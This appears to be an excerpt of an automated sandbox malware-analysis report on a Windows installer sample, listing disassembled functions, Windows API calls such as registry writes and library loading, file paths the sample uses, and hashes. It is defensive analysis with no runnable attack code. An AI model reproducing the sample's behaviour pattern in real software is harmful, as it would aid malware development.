                                                  • String ID:
                                                  • API String ID: 3962662361-3916222277
                                                  • Opcode ID: 60a16e74f866e9e5a70fce5183a4eefb2234932a1e3c515c62e21d0cbae301ce
                                                  • Instruction ID: 6d121c78663f9c139a3f4e37260f3f13d48122d751ebbdd8aee2f62c76321b6a
                                                  • Opcode Fuzzy Hash: 60a16e74f866e9e5a70fce5183a4eefb2234932a1e3c515c62e21d0cbae301ce
                                                  • Instruction Fuzzy Hash: 974193B94003089BEB199F749AC4B993FACFB44354F184575E94B9E5C6FB78C248CB60

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 982 4023e4-40240b call 402c41 * 2 call 402cd1 988 402410-402415 982->988 989 402ac5-402ad4 988->989 990 40241b-402425 988->990 992 402427-402434 call 402c41 lstrlenW 990->992 993 402438-40243b 990->993 992->993 996 40243d-40244e call 402c1f 993->996 997 40244f-402452 993->997 996->997 999 402463-402477 RegSetValueExW 997->999 1000 402454-40245e call 4031d6 997->1000 1004 402479 999->1004 1005 40247c-40255d RegCloseKey 999->1005 1000->999 1004->1005 1005->989 1007 40288b-402892 1005->1007 1007->989
                                                  APIs
                                                  • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp,00000023,00000011,00000002), ref: 0040242F
                                                  • RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp,00000000,00000011,00000002), ref: 0040246F
                                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp,00000000,00000011,00000002), ref: 00402557
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: CloseValuelstrlen
                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp
                                                  • API String ID: 2655323295-3418755209
                                                  • Opcode ID: 73e16f22230fec4bb41596bf14ea3730359cb40e1001d342c6dd81160fbf5f59
                                                  • Instruction ID: 2320c74fc41ffeb716861e397aa06506e2c1d49fdd3331f7b5a779c93e7e4390
                                                  • Opcode Fuzzy Hash: 73e16f22230fec4bb41596bf14ea3730359cb40e1001d342c6dd81160fbf5f59
                                                  • Instruction Fuzzy Hash: C4118471E00104BEEB10AFA5DE89EAEBB74EB44754F11803BF504B71D1DBB89D419B68
                                                  APIs
                                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: Close$Enum
                                                  • String ID:
                                                  • API String ID: 464197530-0
                                                  • Opcode ID: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                  • Instruction ID: 3410daaf41eb2a8de7896e1fb7aa518538b3e031ab7f3cb45a1fbd23233d04dd
                                                  • Opcode Fuzzy Hash: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                  • Instruction Fuzzy Hash: CE116A32500108FBDF12AB90CE09FEE7B7DAF44350F100076B905B61E0E7B59E21AB58
                                                  APIs
                                                    • Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,?,?,756F2EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,756F2EE0,00000000), ref: 00405D76
                                                    • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
                                                    • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93
                                                  • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                    • Part of subcall function 0040591F: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405962
                                                  • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\brugser\brugo\Obstetriker,?,00000000,000000F0), ref: 0040164D
                                                  Strings
                                                  • C:\Users\user\AppData\Roaming\brugser\brugo\Obstetriker, xrefs: 00401640
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                  • String ID: C:\Users\user\AppData\Roaming\brugser\brugo\Obstetriker
                                                  • API String ID: 1892508949-1454378569
                                                  • Opcode ID: c670449cb20163be3cb3cb34affd8c81282aa0e3ca4a40f31796d9e50139b1da
                                                  • Instruction ID: 0139da5d792eeb989572d84d187c25f91b4f70b2bd1842bf542401118de2a59f
                                                  • Opcode Fuzzy Hash: c670449cb20163be3cb3cb34affd8c81282aa0e3ca4a40f31796d9e50139b1da
                                                  • Instruction Fuzzy Hash: 0511E631504511EBCF30AFA4CD4159F36A0EF15329B29453BFA45B22F1DB3E49419B5D
                                                  APIs
                                                  • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000002,?,00000000,?,?,Call,?,?,0040652A,80000002), ref: 004062FC
                                                  • RegCloseKey.KERNELBASE(?,?,0040652A,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll), ref: 00406307
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: CloseQueryValue
                                                  • String ID: Call
                                                  • API String ID: 3356406503-1824292864
                                                  • Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                  • Instruction ID: efe3e51cb47fe95fa6bbb83f3cb46ebf457b8c4b35673ac5825ceff03b23bf8b
                                                  • Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                  • Instruction Fuzzy Hash: B301717250020AEBDF218F55CD09EDB3FA9EF55354F114039FD15A2150E778D964CBA4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                  • Instruction ID: 2bd06e12bed6e0bcd81d630d0cd78bd49004ac77cb8b5ebb757de7108a839e92
                                                  • Opcode Fuzzy Hash: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                  • Instruction Fuzzy Hash: 1DA14471E04228CBDF28CFA8C8446ADBBB1FF44305F14806ED856BB281D7786A86DF45
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                  • Instruction ID: f1da02a2f8b93330a3d469e31e6e9edf047fa596270f1f1d86c95cc791e20b04
                                                  • Opcode Fuzzy Hash: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                  • Instruction Fuzzy Hash: AA910271E04228CBEF28CF98C8447ADBBB1FB45305F14816AD856BB291C778A986DF45
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                  • Instruction ID: fb1d02f26201205f5bfcbd3029eb7cfad7cca69a3f8c46de7b35964bdd0c3f7d
                                                  • Opcode Fuzzy Hash: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                  • Instruction Fuzzy Hash: 18814571E04228DFDF24CFA8C844BADBBB1FB45305F24816AD856BB291C7389986DF45
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                  • Instruction ID: 55fc176551b00f8465723d30588461dcf2fc1d3195b414c524ee7a2fcbdbe87b
                                                  • Opcode Fuzzy Hash: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                  • Instruction Fuzzy Hash: 39815971E04228DBEF24CFA8C844BADBBB1FB45305F14816AD856BB2C1C7786986DF45
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                  • Instruction ID: 7645ab34ef40ba223d211dbe726f8302725d3f31b3e808d93cc70016d3e0d248
                                                  • Opcode Fuzzy Hash: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                  • Instruction Fuzzy Hash: 10711471E04228DBDF24CF98C8447ADBBB1FF49305F15806AD856BB281C7389A86DF45
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                  • Instruction ID: a4e19b7408f2815589132e7e2b866ae2b9c8caa40868d81b8a4623295251dea3
                                                  • Opcode Fuzzy Hash: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                  • Instruction Fuzzy Hash: 0D712571E04218DBEF28CF98C844BADBBB1FF45305F15806AD856BB281C7389986DF45
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                  • Instruction ID: 979076adb26e5f1e3e7a9458f232081f51f9a0722543042d1d726f4d31452a21
                                                  • Opcode Fuzzy Hash: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                  • Instruction Fuzzy Hash: 50714871E04228DBEF28CF98C8447ADBBB1FF45305F15806AD856BB281C7386A46DF45
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 004032F2
                                                    • Part of subcall function 0040345D: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040315B,?), ref: 0040346B
                                                  • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,00403208,00000004,00000000,00000000,?,?,00403182,000000FF,00000000,00000000,0040A230,?), ref: 00403325
                                                  • SetFilePointer.KERNELBASE(000053CA,00000000,00000000,00414ED0,00004000,?,00000000,00403208,00000004,00000000,00000000,?,?,00403182,000000FF,00000000), ref: 00403420
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: FilePointer$CountTick
                                                  • String ID:
                                                  • API String ID: 1092082344-0
                                                  • Opcode ID: 46bf3b49fb3124b20b26849d3f96ebab8958347a080c85236d637af58840fa95
                                                  • Instruction ID: a2c2ae871b20a7f651e14226ae934804f023725c52e887911cb1b1382089a511
                                                  • Opcode Fuzzy Hash: 46bf3b49fb3124b20b26849d3f96ebab8958347a080c85236d637af58840fa95
                                                  • Instruction Fuzzy Hash: 54313872610215DBD721DF29EEC496A3BA9F74039A754433FE900F62E0CBB99D018B9D
                                                  APIs
                                                  • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 0040205D
                                                    • Part of subcall function 00405450: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                    • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,Skipped: C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                    • Part of subcall function 00405450: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll,00402F08,00402F08,Skipped: C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll,00000000,00000000,00000000), ref: 004054AB
                                                    • Part of subcall function 00405450: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll), ref: 004054BD
                                                    • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                    • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                    • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                  • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040206E
                                                  • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004020EB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                  • String ID:
                                                  • API String ID: 334405425-0
                                                  • Opcode ID: 063e47513c4376f19a5a3bfc0780f7f4b653f4b7b25b96f5c752c2c38872185d
                                                  • Instruction ID: 38390b8595ebf5dc4f6cf14c4d4b7ed92d06cc21542818b97b262269bef072d5
                                                  • Opcode Fuzzy Hash: 063e47513c4376f19a5a3bfc0780f7f4b653f4b7b25b96f5c752c2c38872185d
                                                  • Instruction Fuzzy Hash: DC218331D00215BACF20AFA5CE4D99E7A70BF04358F60413BF511B51E0DBBD8991DA6E
                                                  APIs
                                                  • SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,00403182,000000FF,00000000,00000000,0040A230,?), ref: 004031FB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
